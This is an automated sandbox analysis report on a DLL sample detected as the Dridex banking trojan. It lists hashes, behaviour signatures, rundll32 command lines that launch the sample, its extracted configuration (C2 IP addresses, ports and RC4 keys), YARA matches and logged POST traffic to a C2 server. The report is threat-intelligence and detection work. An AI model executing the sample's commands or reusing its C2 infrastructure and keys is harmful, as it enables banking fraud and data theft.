Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.8232.dll

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.8232.dll
Analysis ID:510689
MD5:6df0687582c592e9860683a68858e082
SHA1:53780def0699c055381746ce4ecebef8f17fd12d
SHA256:90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Found detection on Joe Sandbox Cloud Basic with higher score
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4248 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2248 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6340 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5016 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6332 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6352 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.429863191.0000000003410000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000003.00000003.404224619.0000000004740000.00000040.00000010.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000003.00000002.690890687.000000006E9F1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000004.00000003.420461174.0000000004120000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.475db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              3.3.rundll32.exe.475db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                2.3.rundll32.exe.492db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  5.3.rundll32.exe.342db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    4.3.rundll32.exe.413db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.2.rundll32.exe.6e9f0000.0.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.690574263.000000006EAB7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.691096574.000000006EAB7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.8232.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EA1CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.3:49745 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.3:49748 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.3:49750 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:24 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.690375377.0000000002F60000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: loaddll32.exe, 00000000.00000003.563593432.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://14.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/Q#
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/l?
                      Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/la
                      Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/q
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.680691305.0000000002F6D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/N
                      Source: rundll32.exe, 00000003.00000003.680691305.0000000002F6D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/dv
                      Source: loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/fW
                      Source: loaddll32.exe, 00000000.00000003.462263005.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/ion
                      Source: loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.689702912.0000000000958000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.690791416.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.544483266.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/#
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/4
                      Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/7.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.462263005.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/:
                      Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/A
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/H
                      Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/N
                      Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/S
                      Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/X
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/a
                      Source: loaddll32.exe, 00000000.00000003.528593129.000000000095A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: loaddll32.exe, 00000000.00000002.689702912.0000000000958000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/e
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/k
                      Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/w
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.452876324.0000000002F60000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/.0.96:6891/m
                      Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/14
                      Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/6
                      Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/F
                      Source: loaddll32.exe, 00000000.00000003.462293153.0000000000998000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/I
                      Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/N
                      Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der
                      Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der.
                      Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/der6
                      Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/derF
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.690791416.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000003.528593129.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/m
                      Source: loaddll32.exe, 00000000.00000003.454214187.0000000000960000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/n
                      Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/r
                      Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/s
                      Source: rundll32.exe, 00000003.00000003.452876324.0000000002F60000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/tv
                      Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmpString found in binary or memory: https://45192.46.210.220/
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EA239F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 3.3.rundll32.exe.475db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.475db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.492db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.342db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.413db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.9fdb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.413db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.492db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.9fdb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.342db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.429863191.0000000003410000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.404224619.0000000004740000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.690890687.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, type: MEMORY
